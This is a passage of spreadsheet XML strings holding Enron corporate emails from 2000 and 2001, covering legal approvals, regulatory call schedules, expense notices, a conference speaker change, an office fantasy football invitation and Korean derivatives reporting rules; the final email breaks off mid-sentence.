  <si>
    <t>Mon, 12 Feb 2001 03:17:00 -0800 (PST)</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Vince J Kaminski/HOU/ECT on 02/12/2001 _x000D_
11:17 AM ---------------------------_x000D_
_x000D_
_x000D_
"Btu" &lt;subs@btu.net&gt; on 02/09/2001 04:19:24 PM_x000D_
To: "Btu Weekly" &lt;&gt;_x000D_
cc:  _x000D_
Subject: Btu Weekly_x000D_
_x000D_
_x000D_
_x000D_
Attached is the latest issue of Btu Weekly._x000D_
_x000D_
e-mail: info@Btu.net_x000D_
phone: 732-758-8222_x000D_
fax: 732-758-8286_x000D_
_x000D_
_x000D_
 - wg021201.pdf_x000D_
</t>
  </si>
  <si>
    <t>Mon, 23 Apr 2001 06:59:27 -0700 (PDT)</t>
  </si>
  <si>
    <t>FW: &lt;&lt;Concur Expense Document&gt;&gt; - Coronado Club</t>
  </si>
  <si>
    <t>FYI_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	eserver@enron.com@ENRON [mailto:IMCEANOTES-eserver+40enron+2Ecom+40ENRON@ENRON.com] _x000D_
Sent:	Thursday, April 19, 2001 7:49 PM_x000D_
To:	jderric@enron.com_x000D_
Subject:	&lt;&lt;Concur Expense Document&gt;&gt; - Coronado Club_x000D_
_x000D_
The Payment status has changed on the following report:_x000D_
_x000D_
Status last changed by: Marie Wallace_x000D_
Expense Report Name: Coronado Club_x000D_
Report Total: $111.40_x000D_
Amount Due Employee: $111.40_x000D_
Amount Approved: $111.40_x000D_
Amount Paid: $111.40_x000D_
Approval Status: Approved_x000D_
Payment Status: Paid_x000D_
_x000D_
_x000D_
To review this expense report, click on the following link for Concur Expense._x000D_
http://xms.enron.com</t>
  </si>
  <si>
    <t>Wed, 8 Nov 2000 01:14:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: RUSH Approval - ANP Power Marketing Company</t>
  </si>
  <si>
    <t xml:space="preserve">Tana,_x000D_
_x000D_
I have no problems._x000D_
_x000D_
Jeff_x000D_
_x000D_
_x000D_
_x000D_
	Tana Jones_x000D_
	11/07/2000 08:23 PM_x000D_
		 _x000D_
		 To: Alan Aronowitz/HOU/ECT@ECT, Jeffrey T Hodge/HOU/ECT@ECT, Stacy E _x000D_
Dickson/HOU/ECT@ECT, Leslie Hansen/HOU/ECT@ECT, Shari Stack/HOU/ECT@ECT, _x000D_
Harry M Collins/HOU/ECT@ECT, David Minns/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, _x000D_
Marie Heard/Enron Communications@Enron Communications, Robbi Rossi/Enron _x000D_
Communications@Enron Communications, John Viverito/Corp/Enron@Enron, Jane _x000D_
McBride/AP/Enron@Enron, Andrea Calo/SA/Enron@Enron_x000D_
		 cc: Bradley Diebner/HOU/ECT@ECT, Tom Moran/HOU/ECT@ECT, Edward _x000D_
Sacks/Corp/Enron@Enron, Karen Lambert/HOU/ECT@ECT, Lisa Lees/HOU/ECT@ECT, _x000D_
Stephanie Sever/HOU/ECT@ECT_x000D_
		 Subject: RUSH Approval - ANP Power Marketing Company_x000D_
_x000D_
The above counterparty should be coming on tonight's list.  We would like to _x000D_
open them for gas ASAP, and Credit is reviewing the financials now to give _x000D_
them some headroom on power.  If you could let me know ASAP whether you have _x000D_
any issues._x000D_
</t>
  </si>
  <si>
    <t>Tue, 27 Nov 2001 13:43:32 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'mparsons@thompsoncoburn.com'})</t>
  </si>
  <si>
    <t>Supplemental Responses of Anaheim, Riverside,              and_x000D_
 Grant to the 1s t Data Request of CSG</t>
  </si>
  <si>
    <t xml:space="preserve"> &lt;&lt;Supplemental Response to CSG DRsAnaheim, Riverside and Grant.DOC&gt;&gt;_x000D_
&lt;&lt;Riverside Sales Above the MMCP.XLS&gt;&gt;_x000D_
_x000D_
 - Supplemental Response to CSG DRsAnaheim, Riverside and Grant.DOC _x000D_
 - Riverside Sales Above the MMCP.XLS </t>
  </si>
  <si>
    <t>Fri, 14 Jul 2000 06:39:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Infineum lawsuit</t>
  </si>
  <si>
    <t>see other email i am sending. it's always something._x000D_
i talked to dick about sending this out._x000D_
_x000D_
Lisa J. Mellencamp_x000D_
Enron North America Corp._x000D_
1400 Smith St._x000D_
Houston, TX  77002_x000D_
Tel:  (713) 853-7986_x000D_
Fax: (713) 646-3393_x000D_
----- Forwarded by Lisa Mellencamp/HOU/ECT on 07/14/2000 01:38 PM -----_x000D_
_x000D_
	Richard Lydecker@ENRON_x000D_
	07/14/2000 10:34 AM_x000D_
		 _x000D_
		 To: Bob Licato/ECP/HOU/ECT@ECT, Gary Keevill/ECP/Enron@Enron_x000D_
		 cc: (bcc: Lisa Mellencamp/HOU/ECT)_x000D_
		 Subject: Infineum lawsuit_x000D_
_x000D_
Bob, Gary given the fact that the lawsuit has been filed I think any _x000D_
communication/discussion internally and externally should be initiated and _x000D_
controlled by our lead counsel for the litigation.  There are issues of _x000D_
privilege/disclosure, etc. the senstivily of which we non-lawyers are not _x000D_
aware that now become very important.   This is particularly important in _x000D_
respect to strategy and evaluation/interpretation of past events and comments _x000D_
on the clarity or ambiguity of those events.  It would be a good idea to pass _x000D_
the word to this effect throughout the organization.  I do know enough about _x000D_
litigation that the legal team now takes the lead and any material or _x000D_
summaries or analyses prepared should be directed by them and handled _x000D_
specifically as they advise.   We need to be especially careful not to _x000D_
circulate any written material without legal clearance.  For the time being, _x000D_
please coordinate anything relevant to the Infineum situation with Lisa _x000D_
Mellencamp for guidance.  Thanks.  Dick.</t>
  </si>
  <si>
    <t>Tue, 3 Apr 2001 04:14:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: DEAL 567990.01</t>
  </si>
  <si>
    <t xml:space="preserve">Leaf finished his shift at 6 a.m. today - he'll be back at 6 p.m. But I _x000D_
talked to Bill Williams about it and he saw the trade in the Real Time log, _x000D_
and said he remembers hearing Leaf do the trade with Sempra. If you have a _x000D_
number for Harry at Sempra, I'd be glad to give him a call and figure this _x000D_
out. Let me know._x000D_
_x000D_
Thanks,_x000D_
Kate_x000D_
_x000D_
_x000D_
Stephanie Piwetz   04/03/2001 10:47 AM_x000D_
_x000D_
To: Kate Symes/PDX/ECT@ECT_x000D_
cc:  _x000D_
_x000D_
Subject: DEAL 567990.01_x000D_
_x000D_
Kate, _x000D_
Deal 567990.01, trader at Sempra, does not show this trade.   Harry from the _x000D_
backoffice called. _x000D_
Please ask Leaf._x000D_
_x000D_
Thanks_x000D_
Stephanie_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 21 Mar 2001 06:38:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'vkaminski@aol.com', 'vince.kaminski@enron.com'})</t>
  </si>
  <si>
    <t>Dinner speaker - May 23</t>
  </si>
  <si>
    <t xml:space="preserve">Vince:_x000D_
_x000D_
Michael Crew would like you to be a speaker on Wednesday, May 23rd_x000D_
instead of the 24th at the Rutgers Conference.  Is this ok?_x000D_
_x000D_
He is preparing the agenda and needs to know as soon as possible._x000D_
_x000D_
Shirley_x000D_
_x000D_
_x000D_
---------------------- Forwarded by Shirley Crenshaw/HOU/ECT on 03/21/2001 _x000D_
02:31 PM ---------------------------_x000D_
_x000D_
_x000D_
"Michael A. Crew" &lt;mcrew@andromeda.rutgers.edu&gt; on 03/21/2001 10:07:52 AM_x000D_
To: shirley.crenshaw@enron.com_x000D_
cc: vkamins@enron.com, crri@andromeda.rutgers.edu, _x000D_
kleindorfer@wharton.upenn.edu _x000D_
Subject: Dinner speaker - May 23_x000D_
_x000D_
_x000D_
_x000D_
Shirley,_x000D_
_x000D_
This is to follow up today's conversation with Anita.  As mentioned Paul _x000D_
Kleindorfer invited Vince to be our dinner speaker on Thursday, May 24.  On _x000D_
reflection given the strong line up for Wednesday - Fred Kahn et al - we _x000D_
would very much like Vince to be the speaker on Wednesday.  This will _x000D_
conclude the day very well giving participants a strong incentive to be there _x000D_
for the Wednesday. _x000D_
_x000D_
I gather that this change should be acceptable to Vince.  _x000D_
_x000D_
We will show Vince's name as follows:_x000D_
_x000D_
 _x000D_
_x000D_
Wincety J. Kaminski_x000D_
_x000D_
Managing Director - Research_x000D_
_x000D_
ENRON_x000D_
_x000D_
_x000D_
_x000D_
Jeremy will be em ailing you the program with this information immediately._x000D_
_x000D_
_x000D_
We would like to go to press today.  Failing that we can go to press _x000D_
tomorrow.  We would very much appreciate your confirming this and making any _x000D_
corrections or changes.  If you would respond to all of us it would be _x000D_
appreciated._x000D_
_x000D_
_x000D_
Michael_x000D_
Michael A. Crew_x000D_
Professor II_x000D_
Director - Center for Research in Regulated Industries_x000D_
Editor - Journal of Regulatory Economics_x000D_
Rutgers University, Graduate School of Management_x000D_
180 University Avenue_x000D_
Newark, N.J. 07102-1897_x000D_
_x000D_
phone: 973 353 5049   fax:  973 353 1348_x000D_
http://www-rci.rutgers.edu/~crri _x000D_
</t>
  </si>
  <si>
    <t>Fri, 9 Nov 2001 16:35:50 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'a..martin@enron.com', 'brian.redmond@enron.com', 'patrick.keene@enron.com', 'jean.ryall@enron.com', 'd..steffes@enron.com'})</t>
  </si>
  <si>
    <t>Texas Intrastate Regulatory Action</t>
  </si>
  <si>
    <t xml:space="preserve">As discussed at the meeting this afternoon attended by Jim Steffes, Becky Cantrell, Brian Redmond, Tom Martin, Pat Keene, and Jean Ryall (via phone):_x000D_
_x000D_
Objective:	Obtain greater transparency and commoditization for transportation of natural gas from liquid points in the production area to markets._x000D_
_x000D_
Government_x000D_
Affairs	(1)  Standard Contract_x000D_
Deliverables:	(2)  White Paper_x000D_
_x000D_
Initial Plan:	(1) Set up meeting next week to discuss particulars of a standard contract.  Attendees to include Jim Steffes, Barbara Gray, Jean Ryall, Leslie Lawner, Julie Gomez, Pat Keene._x000D_
	(2) Identify industry advisor(s) who is(are) well-respected within the Texas gas network who would be willing/able to sponsor the white paper._x000D_
	(3) Review Texas statutes and RRC Codes._x000D_
</t>
  </si>
  <si>
    <t>Tue, 17 Oct 2000 10:04:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'bernadette.hawkins@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'richard.ingersoll@enron.com', 'steve.walton@enron.com', 'tom.chapman@enron.com', 'donna.fulton@enron.com', 'tom.hoatson@enron.com', 'sarah.novosel@enron.com', 'dan.staines@enron.com', 'mary.hain@enron.com', 'kerry.stroup@enron.com', 'steve.montovano@enron.com', 'paul.kaufman@enron.com', 'susan.mara@enron.com', 'thane.twiggs@enron.com', 'jeff.brown@enron.com', 'ron.mcnamara@enron.com', 'janine.migden@enron.com', 'tom.delaney@enron.com', 'robin.kittel@enron.com', 'daniel.allegretti@enron.com', 'jeff.dasovich@enron.com', 'james.steffes@enron.com', 'christi.nicolay@enron.com', 'joe.connor@enron.com', 'joe.hartsoe@enron.com'})</t>
  </si>
  <si>
    <t>RTO Filing Conference Call Schedule UPDATE</t>
  </si>
  <si>
    <t xml:space="preserve">FYI - If you would like to participate._x000D_
----- Forwarded by Bernadette Hawkins/Corp/Enron on 10/17/2000 04:59 PM -----_x000D_
_x000D_
	"Jackie Gallagher" &lt;JGallagher@epsa.org&gt;_x000D_
	10/17/2000 11:05 AM_x000D_
		 _x000D_
		 To: &lt;bhawkin@enron.com&gt;, &lt;bmerola@enron.com&gt;, &lt;christi.l.nicolay@enron.com&gt;, _x000D_
&lt;janelle.scheuer@enron.com&gt;, &lt;jhartso@enron.com&gt;, &lt;mary.hain@enron.com&gt;, _x000D_
&lt;sarah.novosel@enron.com&gt;, &lt;tom.hoatson@enron.com&gt;_x000D_
		 cc: _x000D_
		 Subject: RTO Filing Conference Call Schedule UPDATE_x000D_
_x000D_
_x000D_
MEMORANDUM_x000D_
_x000D_
TO: Regulatory Affairs Committee_x000D_
       Power Marketers Working Group_x000D_
_x000D_
FROM: Don Santa, Regulatory Affairs Committee Chair_x000D_
            Joe Hartsoe, Power Marketing Working Group Chair_x000D_
            Julie Simon, Vice President of Policy_x000D_
            Mark Bennett, Senior Manager of Policy_x000D_
            Erin Perrigo, Manager of Policy_x000D_
_x000D_
DATE: October 17, 2000_x000D_
_x000D_
RE: RTO Filing Conference Call Schedule UPDATE_x000D_
_x000D_
In the light of the flurry of recent filings, we have revised the RTO _x000D_
conference call schedule.  Since PJM made its RTO filing on October 11th, and _x000D_
RTO West has made public its intent to file its substantive RTO proposal one _x000D_
week after the October 16th deadline, we will discuss the PJM filing on _x000D_
Friday in place of RTO West.  We will schedule a call on RTO West and any _x000D_
other significant filings that may be made for Friday, October 27th.  A _x000D_
schedule for those calls will follow._x000D_
_x000D_
Friday, October 20_x000D_
? 1:30 PM  PJM - Filing available at www.pjm.com, under the "Documents"_x000D_
                            link, then under "FERC Filings"_x000D_
_x000D_
? 2:30 PM  SPP/Entergy -SPP's filing available at www.spp.org; Entergy's_x000D_
                  filing available at www.entergy.com, under "Company_x000D_
                  Information," then under "Transmission Business"_x000D_
_x000D_
? 3:30 PM Desert STAR - Filing will be available at www.dstarnet.com_x000D_
_x000D_
Monday, October 23_x000D_
? 10:00 AM Grid South Transco - Filing available at www.gridsouth.com,_x000D_
                   under "FERC Filing Documents"_x000D_
_x000D_
? 11:00 AM Grid Florida - Filing available at www.flatransco.com, under_x000D_
                   "Filing Documents"_x000D_
_x000D_
? 12:00 AM Southern Gridco - will be at www.southernco.com later this_x000D_
                  week_x000D_
_x000D_
To access the calls, dial 1-800-937-6563 and ask for the Julie Simon/EPSA _x000D_
call.  If you have any questions, please contact Julie Simon at 202-789-7200 _x000D_
or jsimon@epsa.org._x000D_
_x000D_
Jacqueline Gallagher_x000D_
Research/Policy Assistant_x000D_
Electric Power Supply Association_x000D_
1401 H Street, NW_x000D_
Suite 760_x000D_
Washington, DC  20005_x000D_
202.789.7200_x000D_
202.789.7201_x000D_
jgallagher@epsa.org_x000D_
</t>
  </si>
  <si>
    <t>Wed, 31 Jan 2001 01:48:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: E-Schedules</t>
  </si>
  <si>
    <t xml:space="preserve">I didn't have a check off list of the ones that I made copies of and _x000D_
submitted but I do know for sure that I turned in Co.272.  Marnie worked on _x000D_
them late made a comment about that Co. having a lot of schedules._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Tammy Barta_x000D_
01/31/2001 09:43 AM_x000D_
To: Dana Davis/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Re: E-Schedules  _x000D_
_x000D_
Dana,_x000D_
4th Qtr 2000?  I don't have them but I'm curious.  Were copies ever turned in _x000D_
to Keith Simper? _x000D_
_x000D_
Thanks,_x000D_
Tammy_x000D_
_x000D_
_x000D_
   _x000D_
	Enron North America Corp._x000D_
	_x000D_
	From:  Dana Davis                           01/31/2001 09:37 AM_x000D_
	_x000D_
_x000D_
To: Brian Schwertner/NA/Enron@Enron, Rosalyn Lum/Corp/Enron@Enron, Lisa _x000D_
Best/Corp/Enron@Enron, Lisa King/HOU/ECT@ECT, Kristi _x000D_
Fredericks/NA/Enron@ENRON, Laynie East/HOU/ECT@ECT, Susan _x000D_
Rance/NA/Enron@Enron, Stacy Hardy/Corp/Enron@ENRON, Brian K _x000D_
Dawson/NA/Enron@ENRON, Dana Davis/HOU/ECT@ECT, Tammy Barta/HOU/ECT@ECT, _x000D_
Rufino Doroteo/HOU/ECT@ECT, Brad Carey/NA/Enron@Enron, Stephen _x000D_
Wolfe/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: E-Schedules_x000D_
_x000D_
Who has the E-schedules for co. 1n2 and 272?  Marnie is looking for them and _x000D_
the aren't in the file cabinet.  Call me and I'll take them to her._x000D_
_x000D_
Thanks._x000D_
_x000D_
Dana_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 30 Oct 2000 06:33:00 -0800 (PST)</t>
  </si>
  <si>
    <t xml:space="preserve">Carol St. Clair_x000D_
EB 3892_x000D_
713-853-3989 (Phone)_x000D_
713-646-3393 (Fax)_x000D_
carol.st.clair@enron.com_x000D_
----- Forwarded by Carol St Clair/HOU/ECT on 10/30/00 02:29 PM -----_x000D_
_x000D_
	Robert Eickenroht@ENRON_x000D_
	Sent by: Andrew Wu@ENRON_x000D_
	10/25/00 06:47 PM_x000D_
		 _x000D_
		 To: yapasu@enron.com, anthony.duenner@enron.com, angel.m.esguerra@enron.com, _x000D_
jgerres@enron.com, james.a.hughes@enron.com, wkrenz@enron.com, _x000D_
sean.long@enron.com, bruce.lundstrom@enron.com, bonnie.nelson@enron.com, _x000D_
andrew.ralston@enron.com, john.viverito@enron.com, jale@azurix.com, _x000D_
kaltit@azurix.com.br, ebattiol@azurix.com, tcash@azurix.com, _x000D_
aconge@azurix.com, edonova@azurix.com, tdorsey@azurix.com, elay@azurix.com, _x000D_
gmendel@azurix.com, legal@wessexwater.co.uk, cwood@azurix.com, _x000D_
ncrady@enron.com, lderrot@enron.com, miguel.mendoza@enron.com, _x000D_
dparker@enron.com, francisco.pinto.leite@enron.com, _x000D_
coralina.rivera@enron.com, carlos.ryerson@enron.com, fsayre@enron.com, _x000D_
david_degabriele@enron.net, kenton_erwin@enron.net, michelle_hicks@enron.net, _x000D_
tlindho@enron.com, steve_mccarrel@enron.net, gmelman@enron.com, _x000D_
kmordau@enron.com, dave_petersen@enron.net, dbargai@enron.com, _x000D_
dlund@nepco.com, kmann@enron.com, john.schwartzenburg@enron.com, _x000D_
csole@enron.com, dasmus@enron.com, mcastano@enron.com, dculver@enron.com, _x000D_
pgrant@enron.com, rgresch@enron.com, joe_hrabik@absfm.com, jkeller@enron.com, _x000D_
marty_keyser@enron.com, kkrasny@enron.com, mmaynard@enron.com, _x000D_
brapp@enron.com, rrossi@enron.com, vsharp@enron.com, msmith1@enron.com, _x000D_
andrew_wu@enron.com, swallac@enron.com, laven@enron.com, _x000D_
reynaldo.garcia@enron.com, kgercke@enron.com, rick.hopkinson@enron.com, _x000D_
cjuvier@enron.com, kmonk@enron.com, smusch@enron.com, ppatman@enron.com, _x000D_
leesa.white@enron.com, jane.wilson@enron.com, aaronow@enron.com, _x000D_
roger.balog@enron.com, pbancza@enron.com, tbushma@enron.com, _x000D_
andrea.calo@enron.com, rcarter@enron.com, mcash@enron.com, bclark3@enron.com, _x000D_
harry.m.collins@enron.com, sdaniel@enron.com, pdelvec@enron.com, _x000D_
rhonda.l.denton@enron.com, stacy.e.dickson@enron.com, sdougla@enron.com, _x000D_
afam@enron.com, Shawna.Flynn@enron.com, bgray@enron.com, _x000D_
wayne.gresham@enron.com, mhaedic@enron.com, brent.hendry@enron.com, _x000D_
jhodge@enron.com, dan.j.hyvl@enron.com, greg.johnston@enron.com, _x000D_
karen.e.jones@enron.com, jordan.mintz@enron.com, pkeohan@enron.com, _x000D_
anne.c.koehler@enron.com, clindsey@mariner-energy.com, dlyons@enron.com, _x000D_
tmccull@enron.com, lisa.mellencamp@enron.com, david.minns@enron.com, _x000D_
jordan.mintz@enron.com, jhmoore@enron.com, janice.r.moore@enron.com, _x000D_
jmurray@enron.com, gnemec@enron.com, dpedigo@enron.com, _x000D_
martin.w.penkwitz@enron.com, dportz@enron.com, drasmus@enron.com, _x000D_
mrobiso@enron.com, esager2@enron.com, richard.b.sanders@enron.com, _x000D_
lschule@enron.com, sshackl@enron.com, cstclai@enron.com, sstack@enron.com, _x000D_
lou.stoler@enron.com, stweed@enron.com, svanhoo@enron.com, sweller@enron.com, _x000D_
awhite2@enron.com, cyoder@enron.com, szisman@enron.com, cabrams@enron.com, _x000D_
dallegre@enron.com, jarmogi@enron.com, aballar@enron.com, _x000D_
michelle.blaine@enron.com, rboston@enron.com, gail.brownfeld@enron.com, _x000D_
sbutche@enron.com, ccheek@enron.com, scovino@enron.com, adadson@enron.com, _x000D_
bdavis@enron.com, jderric@enron.com, reicken@enron.com, rfrank@enron.com, _x000D_
hfromer@enron.com, dgrant@enron.com, mhain@enron.com, jhartso@enron.com, _x000D_
rherman@enron.com, kelly.noel.higgason@enron.com, mholswo@enron.com, _x000D_
pkaufma@enron.com, skean@enron.com, jkeeler@enron.com, ekisluk@enron.com, _x000D_
llawner@enron.com, lara_leibman@enron.com, fmackin@aol.com, _x000D_
kathleen_magruder@enron.com, dmaxey@enron.com, mmetts@enron.com, _x000D_
jmigden@enron.com, cnicola@enron.com, snovose@enron.com, dnutt@enron.com, _x000D_
cpatric@enron.com, rrogers@enron.com, rshapiro@enron.com, fsmith@enron.com, _x000D_
ksulliv@enron.com, bvote@enron.com, rob.walls@enron.com, bwhite2@enron.com, _x000D_
robert.c.williams@enron.com, alan.black@enron.com, mbrown@enron.com, _x000D_
mary.nell.browning@enron.com, adam.duguid@enron.com, mark.elliott@enron.com, _x000D_
mevans@enron.com, sarah.gregory@enron.com, shands@etol.co.uk, _x000D_
martin.rosell@enron.com, rahul.saxena@enron.com, psimons@enron.com, _x000D_
tim.underdown@enron.com, gbahlma@enron.com, cynthia.harkness@enron.com, _x000D_
scott.sefton@enron.com, jlamb@enron.com, enewell@enron.com, _x000D_
aumanof@enron.com, edward_attanasio@eott.com, steve_duffy@eott.com, _x000D_
mike_kelly@eott.com, david_lawler@eott.com, molly_sample@eott.com, _x000D_
annette.vogel@eott.com, john_zimmerman@eott.com, walt_zimmerman@eott.com, _x000D_
sbulgaw@enron.com, elabano@enron.com, rmeyer@enron.com, scorman@enron.com, _x000D_
pcrowle@enron.com, ddornan@enron.com, dfossum@enron.com, sholtzm@enron.com, _x000D_
lhuber@enron.com, fking@enron.com, ckyle@enron.com, dmccopp@enron.com, _x000D_
mmoran@enron.com, mpavlou@enron.com, tpryor@enron.com, craker@enron.com, _x000D_
breich@enron.com, sscott3@enron.com, lsoldano@enron.com, jtalcott@enron.com, _x000D_
kwilkie@enron.com, tom.shelton@enron.com, wcline@enron.com, _x000D_
lena.kasbekar@enron.com, sandeep.katwala@enron.com, abha.kaul@enron.com, _x000D_
jchin@enron.com, ncorbet@enron.com, todd.culwell@enron.com, _x000D_
daniel.r.rogers@enron.com, tlehan@enron.com, eneufel@enron.com, _x000D_
jplace@enron.com, sscrogg@enron.com, david_aamodt@pgn.com, _x000D_
cheryl_chevis@pgn.com, jay_dudley@pgn.com, barbara_halle@pgn.com, _x000D_
douglas_nichols@pgn.com, robin_tompkins@pgn.com, aw_turner@pgn.com, _x000D_
vickie_wolk-laniewski@pgn.com, al_alexanderson@pgn.com, _x000D_
ron_w_johnson@pgn.com, mack_shively@pgn.com, sarap@enron.com, _x000D_
aberton@enron.com, ann.birosel@enron.com, castro@elektro.com.br, _x000D_
gfrumki@enron.com, rgeorge@enron.com, dklinger@elektro.com.br, _x000D_
vicky.martinez@enron.com, maria_eugenia_mosciaro@ei.enron.com, _x000D_
jnovak@enron.com, epavao@enron.com, paula.porto@enron.com, _x000D_
sassaki@elektro.com.br, luiz.watanabe@enron.com, ryoung4@enron.com, _x000D_
cristian_dougall@tgs.com.ar, Edwin _x000D_
Essandoh/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, David L _x000D_
Roland/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Gerry _x000D_
Willis/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Richard DiMichele/Enron _x000D_
Communications@Enron Communications, Scott _x000D_
Dieball/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Carmen _x000D_
Pokluda/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Richard Freed/HOU/EES@EES, _x000D_
Laurel S Gleason/EFS/EES@EES, Sandi M Braband/HOU/ECT@ECT, Chris _x000D_
Gaffney/HOU/ECT@ECT, Matthias Lee/SIN/ECT@ECT, Mark Taylor/HOU/ECT@ECT, _x000D_
Michael Schuh/FRA/ECT@ECT, Jack Harmuth/Corp/Enron@Enron, Ray _x000D_
Alvarez/TRANSREDES@TRANSREDES, Raul Baldivia/TRANSREDES@TRANSREDES, Fernando _x000D_
Gonzalez/TRANSREDES@TRANSREDES, Juan Pablo Sanchez/TRANSREDES@TRANSREDES, _x000D_
Cynthia Trigo/TRANSREDES@TRANSREDES_x000D_
		 cc: Stephanie Harris/Corp/Enron@ENRON_x000D_
		 Subject: Enron Noncompetition Agreement; Important Notice_x000D_
_x000D_
At the request of Jim Derrick, attached is a Memorandum from Mr. Derrick to _x000D_
all Enron Attorneys outlining the obligations of Enron Corp., Enron Energy _x000D_
Services, LLC and their respective controlled affiliates under a _x000D_
Noncompetition Agreement that was recently executed.  Also attached is an _x000D_
Executive Summary of the Agreement and an electronic version of the Agreement _x000D_
as executed.  Please also circulate this Memorandum to any attorneys in your _x000D_
respective business units if they are not on this distribution.  _x000D_
_x000D_
Please note that the Noncompetition Agreement and the transactions underlying _x000D_
same are highly confidential and have not been publicly announced.  _x000D_
Therefore, please treat same with strict confidence._x000D_
_x000D_
The attachments are also being distributed to the Enron Corporate Development _x000D_
Group and members of the Enron Executive Committee._x000D_
_x000D_
Robert_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 28 Jun 2000 01:23:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'timothy.blanchard@enron.com', 'david.baumbach@enron.com', 'bryan.hull@enron.com', 'harry.bucalo@enron.com', 'dasparado@aol.com', 'brian.hoskins@enron.com', 'phillip.love@enron.com', 'jody.crook@enron.com', 'mballases@hotmail.com', "o'neal.winfree@enron.com", 'michael.walters@enron.com', 'chad.landry@enron.com', 'matthew.lenhart@enron.com', 'hector.campos@enron.com', 'jason.bass2@compaq.com'})</t>
  </si>
  <si>
    <t>FANTASY FOOTBALL 2000</t>
  </si>
  <si>
    <t xml:space="preserve">It is coming up on that time again.  The most glorious time of year.  The _x000D_
time of the year when life begins anew.  No, not spring, FOOTBALL SEASON!_x000D_
_x000D_
That being said, it is time to start thinking about fantasy football again._x000D_
_x000D_
I need to know who of you is interested in playing again, and any suggestions _x000D_
on rule changes (i.e. scoring, fees, etc.). I was thinking about having the _x000D_
draft in late August._x000D_
_x000D_
Let me know if you have any friends that you think might want to play._x000D_
_x000D_
_x000D_
-Eric_x000D_
</t>
  </si>
  <si>
    <t>Fri, 30 Mar 2001 05:10:00 -0800 (PST)</t>
  </si>
  <si>
    <t>(MS-18) NOTICE OF INTENTION TO TRANSFER MEMBERSHIPS</t>
  </si>
  <si>
    <t xml:space="preserve">Member Services_x000D_
Notice No. MS-18_x000D_
March 30, 2001_x000D_
_x000D_
COMMODITY EXCHANGE, INC._x000D_
_x000D_
NOTICE OF INTENTION TO TRANSFER MEMBERSHIPS_x000D_
_x000D_
Notice of Intention to Transfer Memberships has been posted on the bulletin _x000D_
board of the Exchange by:_x000D_
_x000D_
Peter Froats (PLF-7965),_x000D_
_x000D_
Laurence Norton of Prudential Securities Inc._x000D_
_x000D_
And_x000D_
_x000D_
James Pettit (JVP-7421)_x000D_
_x000D_
In connection therewith, notification of any claims against the _x000D_
aforementioned individual arising out of transactions executed on the _x000D_
Exchange up to the close of business on March 30, 2001, must be submitted to _x000D_
the Corporate Secretary's Office within ten (10) days._x000D_
_x000D_
Inquiries regarding the above should be directed to the Member Services _x000D_
Department at (212) 299-2370._x000D_
_x000D_
_x000D_
_x000D_
___________________________________________________x000D_
Please click on the link below to indicate you have received this_x000D_
email._x000D_
_x000D_
"http://208.206.41.61/email/email_log.cfm?useremail=tana.jones@enron.com&amp;refdo_x000D_
c=(MS-18)"_x000D_
_x000D_
Note: If you click on the above line and nothing happens, please copy_x000D_
the text between the quotes, open your internet browser,_x000D_
paste it into the web site address and press Return._x000D_
</t>
  </si>
  <si>
    <t>Fri, 25 Aug 2000 10:43:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'jae-moo.lee@enron.com'})</t>
  </si>
  <si>
    <t>Re: EOL Korea</t>
  </si>
  <si>
    <t xml:space="preserve">Matt,_x000D_
_x000D_
Thank you for your note.   I understand that the reporting requirement _x000D_
(According to the Korean Foreign Exchange Transaction Regulations("FETR"), a _x000D_
prior report to the Bank of Korea is required for the Derivative Transaction _x000D_
whose underlying assets are not financial products, i.e., "Commodity _x000D_
Derivative" by our own definition.) is a legal issue to be clarified and _x000D_
handled carefully.   However, speaking with the Bank of Korea and Hyundai _x000D_
Oil, I have the understanding that the Bank of Korea is willing to be _x000D_
flexible enough to accommodate instantaneous on-line derivative trading.  We _x000D_
might need official confirmation of this from the Bank of Korea, but I think _x000D_
that, working with the Bank of Korea, we could find a solution to this legal _x000D_
issue.   The following are some of the facts regarding the reporting _x000D_
requirement issue:_x000D_
_x000D_
Although the Bank of Korea has the legal discretion to reject any report _x000D_
made, when I spoke with them a month ago, they emphasized their intention _x000D_
that they would not reject any report unless the transaction falls under _x000D_
either of the two categories stipulated in the Article 7-61 of the FETR (1. _x000D_
option premium more than 20%,  2. illegal  transaction)._x000D_
_x000D_
Early this week, I talked with the Bank of Korea and Hyundai Oil, and both of _x000D_
them confirmed that since Apr. last year total 17 reports (from Hyundai Oil) _x000D_
have been filed with the Bank of Korea regarding Oil derivative _x000D_
transactions.   All 17 reports were submitted after the transactions had been _x000D_
made (ex post facto reporting), and many times Hyundai Oil put 2-3 _x000D_
transactions together in one package (one-page filled out form per _x000D_
transaction) for reporting.   That's why Kim &amp; Chang, the local law firm, got _x000D_
the information of 7-8 reports from the Bank of Korea.   _x000D_
_x000D_
Both Hyundai Oil and the Bank of Korea said that the report is more like a _x000D_
notification and that the Bank of Korea just checks whether the transaction _x000D_
falls under either of the said 2 categories.  As far as a transaction does _x000D_
not fall under either of the 2 categories, neither the Bank of Korea nor _x000D_
